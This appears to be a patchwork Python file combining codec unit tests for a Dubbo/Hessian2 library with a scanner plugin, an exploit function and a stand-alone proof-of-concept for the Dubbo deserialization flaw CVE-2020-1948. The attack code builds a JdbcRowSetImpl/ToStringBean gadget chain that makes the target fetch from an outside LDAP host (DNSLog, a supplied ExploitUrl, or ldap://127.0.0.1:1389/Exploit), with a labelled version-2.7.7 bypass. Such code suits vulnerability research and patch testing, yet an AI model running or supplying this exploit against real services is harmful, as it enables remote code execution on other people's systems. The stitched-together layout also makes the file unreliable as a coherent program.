def test_new_object():
    """Check that new_object() builds a record from a Java class name plus keyword fields.

    The resulting object exposes the class name via ``__class__.__name__``,
    each keyword as an attribute, and the keyword names as ``_fields``.
    """
    nested_name = new_object('a.b.c.d', a=1, b=2)
    assert nested_name.__class__.__name__ == 'a.b.c.d'
    assert (nested_name.a, nested_name.b) == (1, 2)
    assert nested_name._fields == ('a', 'b')

    # A plain (non-dotted) class name with a single field.
    flat_name = new_object('child', c=1)
    assert flat_name.__class__.__name__ == 'child'
    assert flat_name.c == 1
    assert flat_name._fields == ('c',)
def test_encode_object():
    """Pin the exact bytes encode_object() emits for each supported value kind.

    Covers None/bools, short and long strings, ints and ``long`` values,
    a dict, ``new_object`` records (including nesting), JavaList wrappers,
    a plain list and floats. Expected values are Hessian2 wire bytes that
    the original test recorded; they are treated as golden data here.
    """
    # Single-argument form: (value, expected bytes), asserted in order.
    scalar_cases = [
        (None, b'N'),
        (True, b'T'),
        (False, b'F'),
        ('abcde', b'\x05abcde'),
        ('', b'\x00'),
        (long(1000), b'\xfb\xe8'),
        (long(190000), b'>\xe60'),
        (long(1234567890), b'YI\x96\x02\xd2'),
        (1000, b'\xcb\xe8'),
        (190000, b'\xd6\xe60'),
        (323875, b'I\x00\x04\xf1#'),
        ('a' * 100, b'0d' + b'a' * 100),
        ('a' * 10000, b"S'\x10" + b'a' * 10000),
    ]
    for value, expected in scalar_cases:
        assert encode_object(value) == expected

    record = {
        'androidDeviceRoot': False,
        'hardid': '',
        'phone_number': '12345678901',
        'engine_result': 'ACCEPT',
        'process_time': '2018-07-30 14:41:04'
    }
    assert encode_object(record) == b'H\x11androidDeviceRootF\x06hardid\x00\x0cphone_number\x0b12345678901\rengine_result\x06ACCEPT\x0cprocess_time\x132018-07-30 14:41:04Z'

    # Records are encoded through the three-argument form, as the original test does.
    simple_record = new_object('com.xxx.test', a=1, b=2)
    assert encode_object(simple_record, 0, []) == b'C\x0ccom.xxx.test\x92\x01a\x01b`\x91\x92'

    single_item = JavaList([long(2)])
    assert encode_object(single_item) == b'q\x0ejava.util.List\xe2'
    eight_items = JavaList([long(2)] * 8)
    assert encode_object(eight_items) == b'\x56\x0ejava.util.List\x98\xe2\xe2\xe2\xe2\xe2\xe2\xe2\xe2'
    assert encode_object([2]) == b'y\x92'

    # A record nested inside another record.
    inner = new_object('child', b=long(2))
    outer = new_object('parent', a=inner)
    assert encode_object(outer, 0, []) == b'C\x06parent\x91\x01a`C\x05child\x91\x01ba\xe2'

    float_cases = [
        (0.0, b'\x5b'),
        (1.0, b'\x5c'),
        (127.0, b'\x5d\x7f'),
        (-127.0, b'\x5d\x81'),
        (1.123, b'\x5f\x00\x00\x04c'),
        (-1.123, b'\x5f\xff\xff\xfb\x9d'),
        (0.12345, b'D?\xbf\x9akP\xb0\xf2|'),
        (-0.12345, b'D\xbf\xbf\x9akP\xb0\xf2|'),
    ]
    for value, expected in float_cases:
        assert encode_object(value) == expected
def medusa(**kwargs) -> None:
    """Detection plugin for the Dubbo deserialization issue CVE-2020-1948.

    Reads the target from ``kwargs["Url"]``, sends a single Dubbo request whose
    argument is a Hessian2 object graph, then polls a DNSLog instance; a DNSLog
    hit is taken as confirmation and is written out through VulnerabilityDetails
    and WriteFile. Any exception inside the try block is routed to ErrorLog and
    swallowed, so the function returns None in all cases except a failure in
    UrlProcessing, which runs before the try block and propagates to the caller.
    """
    Url = kwargs.get("Url")  # the target URL passed in by the caller

    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        # NOTE(review): no-op branch. With another scheme and no explicit port,
        # port stays None and int(port) below raises TypeError, which the broad
        # except turns into an ErrorLog entry rather than a clear message.
        port = port
    try:
        DL = Dnslog()
        client = DubboClient(url, int(port))

        # The three records below are serialized by the client into the request.
        # The only signal this plugin reads back is whether DL.result() reports a
        # callback for DL.dns_host(); the response body is just attached to the report.
        JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
                                    dataSource="ldap://" + DL.dns_host(),
                                    strMatchColumns=["foo"])
        JdbcRowSetImplClass = new_object(
            'java.lang.Class',
            name="com.sun.rowset.JdbcRowSetImpl",
        )
        toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
                                  beanClass=JdbcRowSetImplClass,
                                  obj=JdbcRowSetImpl)

        resp = client.send_request_and_return_response(
            service_name=
            'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
            # Original author's note (translated): the method name here may also be
            # $invokeSync, $echo, etc.; claimed to cover 2.7.7 and every version listed in the CVE.
            method_name='$invoke',
            args=[toStringBean])
        # Presumably gives the target time to resolve the callback name before polling — TODO confirm.
        time.sleep(3)
        if DL.result():
            # NOTE(review): resp comes from the remote host and is embedded verbatim
            # in the report; downstream writers should treat it as untrusted text.
            Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(
                url, DL.dns_text(), DL.dns_host(), str(resp))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, "", **kwargs).Write()  # pass the url and the scan result through
            WriteFile().result(str(url),
                               str(Medusa))  # write to file: url is the target file name, Medusa the result
    except Exception as e:
        # NOTE(review): if 'algroup' is missing, .get() returns None and the string
        # concatenation below raises TypeError inside the handler — verify the key is always present.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                         e)  # hand the URL and the failing plugin name to the log writer
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Exploit counterpart of the medusa() detection plugin for CVE-2020-1948.

    Differs from detection only in where the ``dataSource`` callback points:
    ``kwargs["ExploitUrl"]`` instead of a DNSLog host. The raw response is wrapped
    in VulnerabilityInfo and written through Exploit(). Exceptions inside the try
    block are printed, logged via ErrorLog and swallowed; UrlProcessing runs before
    the try block, so its failures propagate. RandomAgent is accepted but not read here.
    """
    # NOTE(review): proxies is normalised here but never passed to DubboClient below,
    # so the proxy setting appears to have no effect in this function — confirm intent.
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        # NOTE(review): no-op branch; another scheme without an explicit port leaves
        # port as None and int(port) raises TypeError inside the try block.
        port = port

    # NOTE(review): if ExploitUrl is absent this is None and "ldap://" + None
    # raises TypeError, reported only through the generic error path below.
    ExploitUrl = kwargs.get("ExploitUrl")
    try:

        client = DubboClient(url, int(port))

        # Same three-record Hessian2 object graph as in medusa(); only dataSource differs.
        JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
                                    dataSource="ldap://" + ExploitUrl,
                                    strMatchColumns=["foo"])
        JdbcRowSetImplClass = new_object(
            'java.lang.Class',
            name="com.sun.rowset.JdbcRowSetImpl",
        )
        toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
                                  beanClass=JdbcRowSetImplClass,
                                  obj=JdbcRowSetImpl)

        resp = client.send_request_and_return_response(
            service_name=
            'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
            # Original author's note (translated): the method name here may also be
            # $invokeSync, $echo, etc.; claimed to cover 2.7.7 and every version listed in the CVE.
            method_name='$invoke',
            args=[toStringBean])
        ExploitOutput().Banner()  # banner for the no-output (blind) case
        # NOTE(review): resp is remote-controlled data; it is stored verbatim here.
        _t = VulnerabilityInfo(str(resp))
        Exploit(_t.info, url, **kwargs).Write()  # pass the url and the collected data through
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        # NOTE(review): a missing 'algroup' key makes _ None and the concatenation below
        # raises TypeError inside the handler — verify the key is always present.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # hand the URL and the failing plugin name to the log writer
def test_response_encode():
    """Pin the wire bytes produced by DubboResponse.encode().

    One case with an empty dict body, then two object bodies that differ only
    in their Java class name; the expected bytes were recorded by the original
    test and are treated as golden data.
    """
    empty_body = DubboResponse(7, DubboResponse.OK, {}, None)
    assert empty_body.encode() == b'\xda\xbb\x02\x14\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x03\x91HZ'

    object_cases = (
        ('com.xxxxxxxxxxxx.yyyy.api.Zzzzz',
         b'\xda\xbb\x02\x14\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00|\x91C\x1fcom.xxxxxxxxxxxx.yyyy.api.Zzzzz\x94\x0bfieldAaaaaa\x0bfieldBbbbbb\x07fieldCc\tfieldDddd`TT0$710b918c-e686-4268-917d-06a540e23564\x05hello'),
        ('com.xxxxxxxxxxxx.wwww.api.Zzzzz',
         b'\xda\xbb\x02\x14\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00|\x91C\x1fcom.xxxxxxxxxxxx.wwww.api.Zzzzz\x94\x0bfieldAaaaaa\x0bfieldBbbbbb\x07fieldCc\tfieldDddd`TT0$710b918c-e686-4268-917d-06a540e23564\x05hello'),
    )
    for class_name, expected in object_cases:
        body = new_object(class_name,
                          fieldAaaaaa=True,
                          fieldBbbbbb=True,
                          fieldCc='710b918c-e686-4268-917d-06a540e23564',
                          fieldDddd='hello')
        response = DubboResponse(1, DubboResponse.OK, body, None)
        assert response.encode() == expected
from dubbo.codec.hessian2 import Decoder, new_object
from dubbo.client import DubboClient
import sys

# Stand-alone proof-of-concept script for CVE-2020-1948 against a local Dubbo
# instance: builds a Hessian2 object graph, sends one request and prints the
# raw response. The port is the single command-line argument.
# NOTE(review): sys.argv[1] is read without a length check, so running the
# script with no argument fails with IndexError rather than a usage message;
# the whole script also runs at import time (no __main__ guard).
client = DubboClient('127.0.0.1', int(sys.argv[1]))

# Callback endpoint is hard-coded to the loopback address; a test LDAP listener
# is presumably expected there — TODO confirm in the accompanying setup notes.
JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
                            dataSource="ldap://127.0.0.1:1389/Exploit",
                            strMatchColumns=["foo"])
JdbcRowSetImplClass = new_object(
    'java.lang.Class',
    name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
                          beanClass=JdbcRowSetImplClass,
                          obj=JdbcRowSetImpl)
# POC 1 CVE-2020-1948
# resp = client.send_request_and_return_response(
#     service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
#     method_name='rce',
#     args=[toStringBean])
# 2.7.7 bypass
# Unlike the commented-out variant above, the object graph is passed in the
# method_name field and args is left empty; the author labels this the 2.7.7 bypass.
resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
    method_name=[toStringBean],
    service_version='1.0.0',
    args=[])

# NOTE(review): resp is whatever the remote host returned; it is printed verbatim.
print(resp)